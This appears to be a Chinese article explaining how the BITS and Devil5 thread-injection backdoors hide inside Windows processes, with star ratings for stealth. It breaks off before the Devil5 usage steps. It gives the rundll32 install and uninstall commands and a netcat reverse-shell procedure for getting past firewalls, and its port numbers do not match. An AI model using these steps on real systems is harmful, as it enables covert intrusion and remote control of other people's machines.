首先我们来简单解释一下什么是典型的"线程插入"后门:这种后门在运行时没有进程,所有网络操作均播入到其他应用程序的进程中完成。也就

是说，即使受控制端安装的防火墙拥有“应用程序访问权限”的功能，也不能对这样的后门进行有效的警告和拦截，也就使对方的防火墙形同虚设

了!这种后门是现在非常主流的一种，很让防护的人头疼，因为对它的查杀比较困难，

　　这类的典范就是国内提倡网络共享的小榕的BITS了，从它的推出以来，各类安全工具下载园地里BITS就高居榜首，非常多的朋友使用它的过程

中感到了方便。

　　类型：系统后门

　　使用范围：wind200/xp/2003

　　隐蔽程序：★★★★☆

　　使用难度：★★★☆☆

　　查杀难度：★★★★☆

　　BITS其实是Background Intelligent Transfer Servicer的缩写，可以在不知不觉中实现另一种意义的典型的线程插入后门，有以下特点：进

程管理器中看不到;平时没有端口，只是在系统中充当卧底的角色;提供正向连接和反向连接两种功能;仅适合用于windows 200/xp/2003。

　　生效方式

　　首先黑客会利用3389登录远程计算机，在拥有SYSTEM的权限的前提下，将BITS.DLL拷贝到服务器上，执行CMD命令：

　　rundll32.exe bits.dll,install

　　这样就激活了BIST，程序用这个特征的字符来辨认使用者，也就相当于密码了，然后卸载：rundll32.exe BITS.dll,Uninstall

　　这是最简单的使用，这个后门除了隐蔽性强外，还有两大特点：端口复用和正反向连接。端口复用就是利用系统正常的TCP端口通讯和控制，

比如80、139等，这样的后门，不用自己开端口也不会暴露自己的访问，因为通讯本身就是系统的正常访问!另一个是反向连接，这个很常见。

　　BITS的正向连接，在服务器没有防火墙等措施的时候能起作用，在有防火墙的情况下就可能会使用下面的反向连接方式：

　　在黑客方本地使用NC监听(如：nc -l -p 1234)

　　用NC连接目标主机的任何一个防火墙允许的TCP端口(80/139/445……)

　　输入激活命令；

　　目标主机的CMD将会出现NC监听的端口2222，这样就实现了绕过防火墙的功能了。

　　devil5(魔鬼5号)

　　类型：系统后门

　　使用范围：win200/xp/2003

　　隐蔽程度：★★★★☆

　　使用难度：★★☆☆☆

　　危害程序：★★★★☆

　　查杀难度：★★★☆☆

　　同BITS一样，Devil5也是线程插入式的后门，和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程，

适合对系统有一定了解的使用都使用，由于是自定义插入线程，所以它更难被查杀，下面我们来看看它的使用。

　　生效方式： 

转截请注明:文章来自 pc捍卫者 http://www.pchwz.com 本站发布此文为传递更多信息之目的,不表明pc捍卫者赞同其观点